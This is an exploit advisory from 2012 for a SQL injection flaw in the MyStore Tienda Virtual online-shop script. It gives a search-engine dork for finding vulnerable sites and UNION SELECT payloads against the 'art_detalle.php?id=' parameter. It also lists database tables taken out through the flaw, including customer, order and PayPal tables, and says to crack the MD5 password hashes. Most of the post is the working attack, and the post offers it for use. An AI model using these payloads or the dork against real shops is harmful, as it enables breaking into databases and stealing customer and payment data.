MyStore Tienda Virtual suffers from a remote SQL injection vulnerability.
09b2314ebc737d06bdb61c9ad31c23f7b65c4fe044ea8d749e7a3fa83974af01
========================================================================================
| # Title : SQL Injection MyStore Tienda Virtual |
| # Author : Arturo Zamora |
| # email : Arturo_zamora_c@hotmail.com |
| # DAte : 02/01/2012 |
| # Verified : yes |
| # Risk : High |
| # Published: |
| # Script : MyStore Tienda Virtual http://www.mystore.com.mx/ |
| # Dork : inurl:art_detalle.php?id= |
====================== zeux0r 2012 =================================
Exploit :
======================
http://localhost/path/art_detalle.php?id={sqli}
======================
Example:
======================
http://localhost/path/art_detalle.php?id=-1+UNION+SELECT+1,2,3,4,5,6,7,8,9,10,11,12,13--
http://localhost/path/art_detalle.php?id=-1+UNION+SELECT+1,2,3,4,5,6,7,8,9,10,11,12,13+from+information_schema.tables--
======================
dbs:
======================
articulos
articulos_nivel3
articulos_relacionados
articulos_secciones
atajada
atajadausa
ayuda
ayudausa
banners
banners_conteo
banners_lateral
banners_lateralusa
basket
campania
clientesclientes_envio
clientes_facturacion
colores
comentario
comisionistas
comisionistas_hits
comisionistas_modulos
contacto
descuentos
descuentos_cruzados
descuentos_temp
especificacion
home
homeusa
justin
justinusa
mensajeria
mensajeriausa
mixer
newsletter
newsletter_mensaje
nivel1
nivel2
nivel3
parametros
paypal
pedidos
pedidos_detalle
pedidos_detalleusa
pedidosusa
remate
remateusa
secciones
shopper
sol_info
talisman
tallas
ticker
tickerusa
visitas
======================
Information :
======================
password decrypt md5
======================
I Love U Pumosita
www.insecure.org.mx
================================ Mexican shotos ========================================
Greetz : * zer0-zo0rg * Bucio * Xoxonaizer * Maztor *
-------------------------------------------------------------------------------------------